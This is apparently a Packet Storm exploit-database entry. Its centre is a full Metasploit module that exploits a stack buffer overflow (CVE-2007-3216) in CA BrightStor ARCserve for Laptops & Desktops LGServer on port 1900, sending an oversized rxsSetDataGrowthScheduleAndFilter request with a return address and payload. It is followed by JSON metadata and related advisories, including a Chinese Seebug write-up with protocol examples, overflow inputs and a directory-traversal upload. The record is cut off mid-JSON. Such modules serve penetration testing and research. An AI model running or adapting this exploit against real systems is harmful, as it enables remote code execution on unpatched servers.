ID PACKETSTORM:95525
Type packetstorm
Reporter MC
Modified 2010-11-05T00:00:00
Description
`##
# $Id: $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'CA BrightStor ARCserve for Laptops & Desktops LGServer (rxsSetDataGrowthScheduleAndFilter) Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup
for Laptops & Desktops 11.1. By sending a specially crafted request (rxsSetDataGrowthScheduleAndFilter),
an attacker could overflow the buffer and execute arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 10892 $',
'References' =>
[
[ 'CVE', '2007-3216' ],
[ 'OSVDB', '35329' ],
[ 'BID', '24348' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 700,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows 2000 SP4 English', { 'Ret' => 0x75031dce } ],
],
'DisclosureDate' => 'Jun 6 2007',
'DefaultTarget' => 0))
register_options([ Opt::RPORT(1900) ], self.class)
end
def check
connect
sock.put("0000000019rxrGetServerVersion")
ver = sock.get_once
disconnect
if ( ver =~ /11.1.742/ )
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
connect
data = rand_text_alpha_upper(20080) + [target.ret].pack('V')
data << payload.encoded + rand_text_alpha_upper(25000 - 20084 - payload.encoded.length)
sploit = "0000025000" # Command Length Field
sploit << "rxsSetDataGrowthScheduleAndFilter" # RPC Command
sploit << "~~" # Constant Argument Delimiter
sploit << data
print_status("Trying target #{target.name}...")
sock.put(sploit)
handler
disconnect
end
end
`
{"modified": "2010-11-05T00:00:00", "reporter": "MC", "history": [], "references": [], "href": "https://packetstormsecurity.com/files/95525/CA-BrightStor-ARCserve-for-Laptops-Desktops-LGServer-rxsSetDataGrowthScheduleAndFilter-Buffer-Overflow.html", "viewCount": 0, "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 10.0}, "title": "CA BrightStor ARCserve for Laptops & Desktops LGServer (rxsSetDataGrowthScheduleAndFilter) Buffer Overflow", "id": "PACKETSTORM:95525", "lastseen": "2016-12-05T22:20:55", "objectVersion": "1.2", "type": "packetstorm", "edition": 1, "sourceData": "`## \n# $Id: $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \n \nRank = AverageRanking \n \ninclude Msf::Exploit::Remote::Tcp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'CA BrightStor ARCserve for Laptops & Desktops LGServer (rxsSetDataGrowthScheduleAndFilter) Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup \nfor Laptops & Desktops 11.1. By sending a specially crafted request (rxsSetDataGrowthScheduleAndFilter), \nan attacker could overflow the buffer and execute arbitrary code. \n}, \n'Author' => [ 'MC' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 10892 $', \n'References' => \n[ \n[ 'CVE', '2007-3216' ], \n[ 'OSVDB', '35329' ], \n[ 'BID', '24348' ], \n], \n'Privileged' => true, \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 700, \n'BadChars' => \"\\x00\", \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows 2000 SP4 English', { 'Ret' => 0x75031dce } ], \n], \n'DisclosureDate' => 'Jun 6 2007', \n'DefaultTarget' => 0)) \n \nregister_options([ Opt::RPORT(1900) ], self.class) \nend \n \ndef check \n \nconnect \n \nsock.put(\"0000000019rxrGetServerVersion\") \nver = sock.get_once \n \ndisconnect \n \nif ( ver =~ /11.1.742/ ) \nreturn Exploit::CheckCode::Vulnerable \nend \n \nreturn Exploit::CheckCode::Safe \n \nend \n \ndef exploit \n \nconnect \n \ndata = rand_text_alpha_upper(20080) + [target.ret].pack('V') \ndata << payload.encoded + rand_text_alpha_upper(25000 - 20084 - payload.encoded.length) \n \nsploit = \"0000025000\" # Command Length Field \nsploit << \"rxsSetDataGrowthScheduleAndFilter\" # RPC Command \nsploit << \"~~\" # Constant Argument Delimiter \nsploit << data \n \nprint_status(\"Trying target #{target.name}...\") \nsock.put(sploit) \n \nhandler \ndisconnect \n \nend \n \nend \n`\n", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "2b88df3d48825de63c1c1029ba367557"}, {"key": "cvss", "hash": "2bdabeb49c44761f9565717ab0e38165"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "cc2ce6fd6ca0cf4c916c92e4f077e6a0"}, {"key": "modified", "hash": "0ea0847bba78aab0f6b7dd369fa89c31"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "0ea0847bba78aab0f6b7dd369fa89c31"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "92a54b358b4cf53cca4095e4697e1004"}, {"key": "sourceData", "hash": "3cd76f39802f377ed6f5d22c5a0542f3"}, {"key": "sourceHref", "hash": "abfdc6ff9d1188b2036b0b5e2fb612f7"}, {"key": "title", "hash": "b23295689999e99382fcf9dda0945292"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "published": "2010-11-05T00:00:00", "description": "", "cvelist": ["CVE-2007-3216"], "sourceHref": "https://packetstormsecurity.com/files/download/95525/lgserver_rxssetdatagrowthscheduleandfilter.rb.txt", "hash": "06f7a23ad2b7213f10a5e4f4b2e93c3fe6ad0864916a4f80cd6c865ffe501a93", "enchantments": {"vulnersScore": 7.5}}
{"result": {"cve": [{"id": "CVE-2007-3216", "type": "cve", "title": "CVE-2007-3216", "description": "Multiple buffer overflows in the LGServer component of CA (Computer Associates) BrightStor ARCserve Backup for Laptops and Desktops r11.1 allow remote attackers to execute arbitrary code via crafted arguments to the (1) rxsAddNewUser, (2) rxsSetUserInfo, (3) rxsRenameUser, (4) rxsSetMessageLogSettings, (5) rxsExportData, (6) rxsSetServerOptions, (7) rxsRenameFile, (8) rxsACIManageSend, (9) rxsExportUser, (10) rxsImportUser, (11) rxsMoveUserData, (12) rxsUseLicenseIni, (13) rxsLicGetSiteId, (14) rxsGetLogFileNames, (15) rxsGetBackupLog, (16) rxsBackupComplete, (17) rxsSetDataProtectionSecurityData, (18) rxsSetDefaultConfigName, (19) rxsGetMessageLogSettings, (20) rxsHWDiskGetTotal, (21) rxsHWDiskGetFree, (22) rxsGetSubDirs, (23) rxsGetServerDBPathName, (24) rxsSetServerOptions, (25) rxsDeleteFile, (26) rxsACIManageSend, (27) rxcReadBackupSetList, (28) rxcWriteConfigInfo, (29) rxcSetAssetManagement, (30) rxcWriteFileListForRestore, (31) rxcReadSaveSetProfile, (32) rxcInitSaveSetProfile, (33) rxcAddSaveSetNextAppList, (34) rxcAddSaveSetNextFilesPathList, (35) rxcAddNextBackupSetIncWildCard, (36) rxcGetRevisions, (37) rxrAddMovedUser, (38) rxrSetClientVersion, or (39) rxsSetDataGrowthScheduleAndFilter commands.", "published": "2007-06-14T18:30:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-3216", "cvelist": ["CVE-2007-3216"], "lastseen": "2017-07-29T11:22:05"}], "saint": [{"id": "SAINT:58F4061114E890C4F0819ADA685DFAB3", "type": "saint", "title": "BrightStor ARCserve Backup LGServer rxsUseLicenseIni buffer overflow", "description": "Added: 01/11/2008 \nCVE: [CVE-2007-3216](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3216>) \nBID: [24348](<http://www.securityfocus.com/bid/24348>) \nOSVDB: [35329](<http://www.osvdb.org/35329>) \n\n\n### Background\n\n[BrightStor ARCserve Backup for Laptops and Desktops](<http://www.ca.com/us/products/product.aspx?id=263>) is an automated backup solution optimized for low-bandwidth, intermittent network connections. \n\n### Problem\n\nA buffer overflow vulnerability in the `**rxsUseLicenseIni**` function allows remote attackers to execute arbitrary commands by sending a specially crafted request to the LGServer on port 1900. \n\n### Resolution\n\nApply one of the updates referenced in the [Security Notice](<http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/caarcservebld-securitynotice.asp>). \n\n### References\n\n<http://www.frsirt.com/english/advisories/2007/2121> \n\n\n### Limitations\n\nExploit works on BrightStor ARCserve Backup for Laptops and Desktops 11.1 SP1. \n\n### Platforms\n\nWindows 2000 \nWindows Server 2003 \n \n\n", "published": "2008-01-11T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/brightstor_arcserve_rxsuselicenseini", "cvelist": ["CVE-2007-3216"], "lastseen": "2016-12-14T16:58:03"}, {"id": "SAINT:3B169CAD3745422661F668D355838E33", "type": "saint", "title": "BrightStor ARCserve Backup LGServer rxsUseLicenseIni buffer overflow", "description": "Added: 01/11/2008 \nCVE: [CVE-2007-3216](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3216>) \nBID: [24348](<http://www.securityfocus.com/bid/24348>) \nOSVDB: [35329](<http://www.osvdb.org/35329>) \n\n\n### Background\n\n[BrightStor ARCserve Backup for Laptops and Desktops](<http://www.ca.com/us/products/product.aspx?id=263>) is an automated backup solution optimized for low-bandwidth, intermittent network connections. \n\n### Problem\n\nA buffer overflow vulnerability in the `**rxsUseLicenseIni**` function allows remote attackers to execute arbitrary commands by sending a specially crafted request to the LGServer on port 1900. \n\n### Resolution\n\nApply one of the updates referenced in the [Security Notice](<http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/caarcservebld-securitynotice.asp>). \n\n### References\n\n<http://www.frsirt.com/english/advisories/2007/2121> \n\n\n### Limitations\n\nExploit works on BrightStor ARCserve Backup for Laptops and Desktops 11.1 SP1. \n\n### Platforms\n\nWindows 2000 \nWindows Server 2003 \n \n\n", "published": "2008-01-11T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/brightstor_arcserve_rxsuselicenseini", "cvelist": ["CVE-2007-3216"], "lastseen": "2016-10-03T15:01:55"}, {"id": "SAINT:3081A95B6A8579C20E90845521890B2D", "type": "saint", "title": "BrightStor ARCserve Backup LGServer rxsUseLicenseIni buffer overflow", "description": "Added: 01/11/2008 \nCVE: [CVE-2007-3216](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3216>) \nBID: [24348](<http://www.securityfocus.com/bid/24348>) \nOSVDB: [35329](<http://www.osvdb.org/35329>) \n\n\n### Background\n\n[BrightStor ARCserve Backup for Laptops and Desktops](<http://www.ca.com/us/products/product.aspx?id=263>) is an automated backup solution optimized for low-bandwidth, intermittent network connections. \n\n### Problem\n\nA buffer overflow vulnerability in the `**rxsUseLicenseIni**` function allows remote attackers to execute arbitrary commands by sending a specially crafted request to the LGServer on port 1900. \n\n### Resolution\n\nApply one of the updates referenced in the [Security Notice](<http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/caarcservebld-securitynotice.asp>). \n\n### References\n\n<http://www.frsirt.com/english/advisories/2007/2121> \n\n\n### Limitations\n\nExploit works on BrightStor ARCserve Backup for Laptops and Desktops 11.1 SP1. \n\n### Platforms\n\nWindows 2000 \nWindows Server 2003 \n \n\n", "published": "2008-01-11T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/brightstor_arcserve_rxsuselicenseini", "cvelist": ["CVE-2007-3216"], "lastseen": "2017-01-10T14:03:43"}], "exploitdb": [{"id": "EDB-ID:16409", "type": "exploitdb", "title": "CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow", "description": "CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow. CVE-2007-3216. Remote exploit for windows platform", "published": "2010-11-03T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/16409/", "cvelist": ["CVE-2007-3216"], "lastseen": "2016-02-01T23:48:16"}, {"id": "EDB-ID:16415", "type": "exploitdb", "title": "CA BrightStor ARCserve for Laptops & Desktops LGServer rxsSetDataGrowthScheduleAndFilter Buffer Overflow", "description": "CA BrightStor ARCserve for Laptops & Desktops LGServer (rxsSetDataGrowthScheduleAndFilter) Buffer Overflow. CVE-2007-3216. Remote exploit for windows pla...", "published": "2011-03-10T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/16415/", "cvelist": ["CVE-2007-3216"], "lastseen": "2016-02-01T23:49:06"}, {"id": "EDB-ID:16416", "type": "exploitdb", "title": "CA BrightStor ARCserve for Laptops & Desktops LGServer Multiple Commands Buffer Overflow", "description": "CA BrightStor ARCserve for Laptops & Desktops LGServer Multiple Commands Buffer Overflow. CVE-2007-3216. Remote exploit for windows platform", "published": "2010-11-04T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/16416/", "cvelist": ["CVE-2007-3216"], "lastseen": "2016-02-01T23:49:16"}], "packetstorm": [{"id": "PACKETSTORM:83135", "type": "packetstorm", "title": "CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow", "description": "", "published": "2009-11-26T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://packetstormsecurity.com/files/83135/CA-BrightStor-ARCserve-for-Laptops-Desktops-LGServer-Buffer-Overflow.html", "cvelist": ["CVE-2007-3216"], "lastseen": "2016-12-05T22:11:43"}, {"id": "PACKETSTORM:95523", "type": "packetstorm", "title": "CA BrightStor ARCserve for Laptops & Desktops LGServer Multiple Commands Buffer Overflow", "description": "", "published": "2010-11-05T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://packetstormsecurity.com/files/95523/CA-BrightStor-ARCserve-for-Laptops-Desktops-LGServer-Multiple-Commands-Buffer-Overflow.html", "cvelist": ["CVE-2007-3216"], "lastseen": "2016-12-05T22:23:31"}], "metasploit": [{"id": "MSF:EXPLOIT/WINDOWS/BRIGHTSTOR/LGSERVER_MULTI", "type": "metasploit", "title": "CA BrightStor ARCserve for Laptops and Desktops LGServer Multiple Commands Buffer Overflow", "description": "This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup for Laptops & Desktops 11.1. By sending a specially crafted request to multiple commands, an attacker could overflow the buffer and execute arbitrary code.", "published": "2010-11-04T22:19:26", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "cvelist": ["CVE-2007-3216"], "lastseen": "2018-03-15T12:02:57"}, {"id": "MSF:EXPLOIT/WINDOWS/BRIGHTSTOR/LGSERVER_RXSSETDATAGROWTHSCHEDULEANDFILTER", "type": "metasploit", "title": "CA BrightStor ARCserve for Laptops and Desktops LGServer rxsSetDataGrowthScheduleAndFilter Buffer Overflow", "description": "This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup for Laptops & Desktops 11.1. By sending a specially crafted request (rxsSetDataGrowthScheduleAndFilter), an attacker could overflow the buffer and execute arbitrary code.", "published": "2010-11-04T01:51:54", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "cvelist": ["CVE-2007-3216"], "lastseen": "2018-02-24T18:58:23"}, {"id": "MSF:EXPLOIT/WINDOWS/BRIGHTSTOR/LGSERVER_RXSUSELICENSEINI", "type": "metasploit", "title": "CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow", "description": "This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup for Laptops & Desktops 11.1. By sending a specially crafted request (rxsUseLicenseIni), an attacker could overflow the buffer and execute arbitrary code.", "published": "2008-08-02T15:03:13", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "cvelist": ["CVE-2007-3216"], "lastseen": "2018-02-27T21:00:25"}], "osvdb": [{"id": "OSVDB:35329", "type": "osvdb", "title": "CA BrightStor ARCserve Backup for Laptops & Desktops Multiple Overflows", "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/bsabld-securitynotice.asp)\nSecurity Tracker: 1018216\n[Secunia Advisory ID:25606](https://secuniaresearch.flexerasoftware.com/advisories/25606/)\nOther Advisory URL: http://research.eeye.com/html/advisories/upcoming/20070604.html\nFrSIRT Advisory: ADV-2007-2121\n[CVE-2007-3216](https://vulners.com/cve/CVE-2007-3216)\nBugtraq ID: 24348\n", "published": "2007-06-04T14:48:44", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/osvdb/OSVDB:35329", "cvelist": ["CVE-2007-3216"], "lastseen": "2017-04-28T13:20:31"}], "seebug": [{"id": "SSV:2247", "type": "seebug", "title": "CA ARCserve Backup\u591a\u4e2a\u8fdc\u7a0b\u6ea2\u51fa\u53ca\u76ee\u5f55\u904d\u5386\u6f0f\u6d1e", "description": "BUGTRAQ ID: 24348\r\nCVE(CAN) ID: CVE-2007-3216,CVE-2007-5003,CVE-2007-5004,CVE-2007-5005,CVE-2007-5006\r\n\r\nARCServe Backup for Laptops and Desktops (L&D)\u662f\u9002\u7528\u4e8e\u4e2d\u5c0f\u4e1a\u52a1\u7684ARCServe Backup\u5907\u4efd\u5de5\u5177\u7248\u672c\u3002\r\n\r\nARCserve L&D\u5728\u5904\u7406RPC\u63a5\u53e3\u4e0a\u7684\u7578\u5f62\u8bf7\u6c42\u6570\u636e\u65f6\u5b58\u5728\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u80fd\u5229\u7528\u6b64\u6f0f\u6d1e\u63a7\u5236\u670d\u52a1\u5668\u6216\u6267\u884c\u76ee\u5f55\u904d\u5386\u3002\r\n\r\nARCserve L&D\u4f7f\u7528TCP/1900\u7aef\u53e3\u505a\u4e3aRPC\u63a5\u53e3\u7ba1\u7406ARCserve L&D\u670d\u52a1\u5668\uff0c\u6b63\u5e38\u7684\u901a\u8baf\u793a\u4f8b\u5982\u4e0b\uff1a\r\n\r\n 0000000027rxrLogin~~administrator\r\n ---------------------------------------------\r\n Field 1: 10-digit base10 command length field ("0000000027")\r\n Field 2: RPC command ("rxrLogin")\r\n Field 3: Constant Argument Delimiter ("~~")\r\n Field 4: Argument ("administrator")\r\n\r\n#1 \u8ba4\u8bc1\u7528\u6237\u540d\u7f13\u51b2\u533a\u6ea2\u51fa\r\n\r\nrxRPC.dll\u7684\u8ba4\u8bc1\u90e8\u5206\uff08\u901a\u8fc7TCP/1900\u8bbf\u95ee\uff09\u4e2d\u5b58\u5728\u6808\u6ea2\u51fa\u6f0f\u6d1e\u3002\u5408\u6cd5\u7684\u8ba4\u8bc1\u62a5\u6587\u793a\u4f8b\u5982\u4e0b\uff1a\r\n\r\n 0000000013rxrLogin~~administrator\r\n\r\n\u8ba4\u8bc1\u65f6\u4f7f\u7528wsprintfW\u5c06administrator\u53c2\u6570\u62f7\u8d1d\u5230\u4e86\u6808\u4e0a0x1AC\u5927\u5c0f\u7684\u7f13\u51b2\u533a\uff0c\u4f46\u6ca1\u6709\u6267\u884c\u5b57\u7b26\u4e32\u957f\u5ea6\u68c0\u67e5\uff0c\u5982\u679c\u5728\u7b2c\u4e00\u4e2a\u8ba4\u8bc1\u8bf7\u6c42\u4e2d\u53d1\u9001\u4e86\u8d85\u957f\u7528\u6237\u540d\u7684\u8bdd\u5c31\u53ef\u4ee5\u89e6\u53d1\u53ef\u5229\u7528\u7684\u6ea2\u51fa\u3002\r\n\r\n#2 \u8ba4\u8bc1\u53e3\u4ee4\u7f13\u51b2\u533a\u6ea2\u51fa\r\n\r\nrxRPC.dll\u7684\u8ba4\u8bc1\u90e8\u5206\u5b58\u5728\u6808\u6ea2\u51fa\u6f0f\u6d1e\u3002\u5e26\u6709\u53e3\u4ee4\u7684\u5408\u6cd5\u8ba4\u8bc1\u8bf7\u6c42\u793a\u4f8b\u5982\u4e0b\uff1a\r\n\r\n 1: 0000000030rxrLogin~~administrator~~0000200\r\n 2: MyPasswordIs1234\r\n\r\n\u7b2c\u4e00\u4e2arxrLogin\u8bf7\u6c42\u7684\u7b2c\u4e8c\u4e2a\u53c2\u6570\u5b9a\u4e49\u4e86\u4e0b\u4e00\u4e2a\u8bf7\u6c42\u4e2d\u6240\u8981\u53d1\u9001\u53e3\u4ee4\u7684\u957f\u5ea6\u3002\u5c3d\u7ba1\u5df2\u7ecf\u9a8c\u8bc1\u4e86\u7b2c\u4e8c\u4e2a\u8bf7\u6c42\u4e2d\u7684\u53e3\u4ee4\u5b57\u7b26\u4e32\u957f\u5ea6\u4e3a\u6b63\u786e\u7684\u957f\u5ea6\uff0c\u4f46\u6ca1\u6709\u5bf9\u53e3\u4ee4\u957f\u5ea6\u6267\u884c\u8fb9\u754c\u68c0\u67e5\u3002\u5982\u679c\u5728\u7b2c\u4e8c\u4e2a\u8bf7\u6c42\u4e2d\u7684\u8d85\u957f\u53e3\u4ee4\u6307\u5b9a\u4e86\u8d85\u957f\u53e3\u4ee4\u957f\u5ea6\u7684\u8bdd\uff0c\u5c31\u4f1a\u6ea2\u51fa\u53e3\u4ee4\u5b57\u7b26\u4e32\u76ee\u7684\u5730\u6240\u4f7f\u7528\u7684\u6808\u7f13\u51b2\u533a\u3002\r\n\r\n#3 \u8ba4\u8bc1\u53e3\u4ee4\u6574\u6570\u6ea2\u51fa\r\n\r\nrxRPC.dll\u7684\u8ba4\u8bc1\u90e8\u5206\u5b58\u5728\u6808\u6ea2\u51fa\u6f0f\u6d1e\u3002\u5e26\u6709\u65e0\u6548\u53e3\u4ee4\u7684\u5408\u6cd5\u8ba4\u8bc1\u8bf7\u6c42\u793a\u4f8b\u5982\u4e0b\uff1a\r\n\r\n 1: 0000000030rxrLogin~~administrator~~18\r\n 2: 000000000000000000\r\n\r\n\u52a0\u5bc6\u7684\u65e0\u6548\u53e3\u4ee4\u53ef\u80fd\u5bfc\u81f4\u53ef\u5229\u7528\u7684\u60c5\u51b5\uff1a\r\n\r\n .text: 00231F24 mov cl, [esi+8]\r\n .text: 00231F27 and ecx, 0x0F\r\n .text: 00231F2A add esp, 8\r\n .text: 00231F2D dec ecx ; XXXX Integer Overflow If ECX = 0\r\n .text: 00231F2E mov [esp+0x7C+var_6C], eax\r\n .text: 00231F32 mov dwPasswordCopyLength, ecx\r\n .text: 00231F38 mov eax, ecx\r\n .text: 00231F3A lea esi, [esp+0x7C+var_6C]\r\n .text: 00231F3E mov edi, ebx\r\n .text: 00231F40 shr ecx, 2\r\n .text: 00231F43 rep movs ; XXXX EXCEPTION: HITS PAGE BOUNDARY XXXX\r\n\r\n\u6e90\u7f13\u51b2\u533a\u4e2d\u7684\u6570\u636e\u5305\u542b\u6709\u5927\u91cf\u4e0d\u53ef\u63a7\u7684\u6570\u636e\uff0c\u4f46\u8fd8\u5b58\u5728\u7528\u6237\u540d\u7684\u62f7\u8d1d\uff0c\u56e0\u6b64\u5982\u679c\u5728\u539f\u59cb\u62a5\u6587\u4e2d\u6307\u5b9a\u4e86\u8d85\u957f\u7528\u6237\u540d\u7684\u8bdd\u5c31\u4f1a\u8986\u76d6\u5f02\u5e38\u5904\u7406\u5668\u3002\r\n\r\n#4 \u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\r\n\r\nrxRPC.dll\u7684\u672a\u7ecf\u8ba4\u8bc1\u901a\u8baf\u5b58\u5728\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e\u3002\u4e0a\u4f20\u8bf7\u6c42\u7684\u6587\u4ef6\u793a\u4f8b\u5982\u4e0b\uff1a\r\n\r\n 1: 0000000056rxrReceiveFileFromServer~~8~~test1234.txt~~4~~3675727989\r\n 2: 0000000031~~<file_contents>\r\n\r\n\u8bf7\u6c42\u7684\u7b2c\u4e00\u4e2a\u53c2\u6570\u6307\u5b9a\u4e86rxrReceiveFileFromServer\u7684\u5b50\u547d\u4ee4\uff0c\u6570\u5b578\u8868\u793a\u6587\u4ef6\u4f1a\u4e0a\u4f20\u5230ARCserve L&D\u7684\u5b89\u88c5\u76ee\u5f55\uff1b\u7b2c\u4e8c\u4e2a\u53c2\u6570\u6307\u5b9a\u4e86\u6587\u4ef6\u76ee\u6807\u540d\u79f0\uff1b\u7b2c\u4e09\u4e2a\u53c2\u6570\u6307\u5b9a\u4e86\u76ee\u6807\u6587\u4ef6\u7684\u957f\u5ea6\uff1b\u7b2c\u4e94\u4e2a\u53c2\u6570\u6307\u5b9a\u4e86\u5165\u7ad9\u6587\u4ef6\u7684CRC32\u54c8\u5e0c\u3002\r\n\r\n\u4f46rxRPC.dll\u6ca1\u6709\u9632\u8303\u901a\u8fc7\u5b50\u51fd\u65708\u7684\u76ee\u5f55\u904d\u5386\uff0c\u56e0\u6b64\u5982\u679c\u6587\u4ef6\u540d\u4e2d\u5305\u542b\u6709\u201c..\\\u201d\u7684\u8bdd\uff0c\u5c31\u53ef\u80fd\u5bfc\u81f4\u4ee5\u7cfb\u7edf\u7ea7\u6743\u9650\u5411\u4efb\u610f\u76ee\u5f55\u5199\u5165\u4efb\u610f\u6587\u4ef6\u3002\r\n\r\n#5 \u591a\u4e2a\u7c7b\u4f3c\u7684\u7f13\u51b2\u533a\u6ea2\u51fa\r\n\r\n\u6709\u516b\u4e2a\u901a\u8fc7TCP/1900\u7aef\u53e3\u53ef\u8bbf\u95ee\u7684\u51fd\u6570\u4e2d\u5b58\u5728\u7f13\u51b2\u533a\u6ea2\u51fa\uff0c\u793a\u4f8b\u5982\u4e0b\uff1a\r\n\r\n rxsUseLicenseIni~~<overflow>\r\n rxsLicGetSiteId~~<overflow>\r\n rxsGetLogFileNames~~<overflow>~~40000\r\n rxsGetBackupLog~~aa~~<overflow>~~40000\r\n rxsBackupComplete~~aa~~aa~~aa~~<overflow>~~aa\r\n rxsSetDataGrowthScheduleAndFilter~~aa~~aa~~aa~~aa~~<overflow>\r\n rxsSetDefaultConfigName~~<overflow>\r\n rxrSetMessageLogSettings~~65~~45~~79~~65~~<overflow>~~52~65~73~65~61~72~63~68~21\r\n\r\n\n\nComputer Associates Protection Suites r2\r\nComputer Associates ARCserve Backup (L&D) r4.0\r\nComputer Associates ARCserve Backup (L&D) r11.5\r\nComputer Associates ARCserve Backup (L&D) r11.1 SP2\r\nComputer Associates ARCserve Backup (L&D) r11.1 SP1\r\nComputer Associates ARCserve Backup (L&D) r11.1\r\nComputer Associates ARCserve Backup (L&D) r11.0\r\nComputer Associates Desktop Management Suite 11.2\r\nComputer Associates Desktop Management Suite 11.1\r\nComputer Associates Desktop Management Suite 11.0\n \u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n* \u5728\u4e3b\u673a\u7981\u7528TCP/1900\u7aef\u53e3\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nComputer Associates\r\n-------------------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\n<a href=\"http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/caarcservebld-securitynotice.asp\" target=\"_blank\">http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/caarcservebld-securitynotice.asp</a>", "published": "2007-09-25T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.seebug.org/vuldb/ssvid-2247", "cvelist": ["CVE-2007-3216", "CVE-2007-5003", "CVE-2007-5004", "CVE-2007-5005", 